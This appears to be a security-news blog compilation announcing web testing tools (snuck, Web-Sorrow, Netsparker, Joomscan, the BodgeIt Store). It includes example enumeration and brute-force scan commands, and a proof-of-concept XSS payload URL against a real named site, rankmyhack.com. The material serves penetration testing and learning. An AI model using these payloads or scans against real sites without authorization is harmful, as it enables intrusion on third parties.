snuck : Automatic XSS filter bypass Tool


snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer.

The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion.

In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's.

Description
snuck is quite different from typical web security scanners, it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate.

 The attack vectors are selected on the basis of the reflection context, that is the exact point where the injection falls in the reflection web page's DOM. Having access to the pages' DOM is possible through Selenium Web Driver, which is an automation framework, that allows to replicate operations in web browsers. Since many steps could be involved before an XSS filter is "activated", an XML configuration file should be filled in order to make snuck aware of the steps it needs to perform with respect to the tested web application. Practically speaking, the approach is similar to the iSTAR's one, but it focuses on one particular XSS filter.

Download it from here:
http://code.google.com/p/snuck/downloads/list

Tutorial can be found here:
http://code.google.com/p/snuck/wiki/Tutorial

Web-Sorrow v1.3.6 : a remote web scanner

A perl based tool used for checking a Web server for misconfiguration, version detection, enumeration, and server information. I will build more Functionality in the future. what is's NOT: Vulnerably scanner, inspection proxy, DDoS tool, exploitation framework. It's entirely focused on Enumeration and collecting Info on the target server.


CURRENT functionality:

-S - stands for standard. a set of Standard tests and includes: indexing of directories testing, banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 ok for every req)

-auth - looks for login pages with a list of some of the most common login files and dirs and admin consoles. don't need to be very big list of URLs because what else are going to name it? notAlogin.php???

-Cp - scan with a huge list of plugins dirs. the list is a bit old (2010)

-I - searches the responses for interesting strings

-Ws - looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info

-Fd - look for generally things people don't want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting.

-Fp - FingerPrint server based on behavior (unrefined as of yet)

-ninja - A light weight and undetectable scan that uses bits and peaces from other scans

-Sd - BruteForce Sub Domains

-Db - BruteForce Directories with the big dirbuster Database

-ua - use a custom UserAgent. PUT UA IN QUOTES if theres spaces

-proxy - send all http reqs via a proxy. example: 255.255.255.254:8080

-e - run all the scans in the tool

web-sorrow also has false positives checking on most of it's requests (it pretty accurate but not perfect)

EXAMPLES:

basic: perl Wsorrow.pl -host scanme.nmap.org -S

look for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth

CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I

most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e -ua "I come in peace"

Download it from here:
http://code.google.com/p/web-sorrow/downloads/list

Web application security scanner Netsparker v2.1 released

Netsparker® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.

Netsparker's unique detection and exploitation techniques allows it to be dead accurate in reporting hence it's the first and the only False Positive Free web application security scanner.

Download from here:
http://www.mavitunasecurity.com/blog/announcing-netsparker-21/

Joomscan Update detects 611 vulnerabilities in Joomla


Security Web center released updated version of Joomscan Security Scanner. The updated version detects 611 Vulnerabilities in Joomla CMS. The previous version released on November with capability of detecting 550 Vulnerabilities.

In joomscan you can check for new updates with command: ./joomscan.pl check or ./joomscan.pl update.

Joomla! is probably the most widely-used CMS out there due to its flexibility, user friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites.

Download for Windows (141 KB)
Download for Linux (150 KB)

XSS vulnerability found in RankMyHack.com

A Hacker Named as "lolstorm" found a XSS vulnerability in Rankmyhack.com. The contact form of the website is vulnerable to XSS(cross site scripting). RankmyHack is a hackers ranking site based on their hack.

Vulnerable Link:
www.rankmyhack.com/contact.php

POC:
www.rankmyhack.com/contact.php?subject=XSS onmouseover=alert(this.value);

This displays an alert box with "XSS".

The BodgeIt Store v1.2.0 ~ Web Application Vulnerability Scanner

The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
Some of its features and characteristics:
  • Easy to install - just requires java and a servlet engine, e.g. Tomcat
  • Self contained (no additional dependencies other than to 2 in the above line)
  • Easy to change on the fly - all the functionality is implemented in JSPs, so no IDE required
  • Cross platform
  • Open source
  • No separate db to install and configure - it uses an 'in memory' db that is automatically (re)initialized on start up 
All you need to do is download and open the zip file, and then extract the war file into the webapps directory of your favorite servlet engine.
Then point your browser at (for example) http://localhost:8080/bodgeit
You may find it easier to find vulnerabilities using a pen test tool.

The Bodge It Store include the following significant vulnerabilities:
  • Cross Site Scripting
  • SQL injection
  • Hidden (but unprotected) content
  • Cross Site Request Forgery
  • Debug code
  • Insecure Object References
  • Application logic vulnerabilities


These are the changes made to BodgeIt v1.2.0:

A page has been added for changing you password, and there have been a few miscellaneous tweaks. But the most significant changes have been enablers for the security regression tests.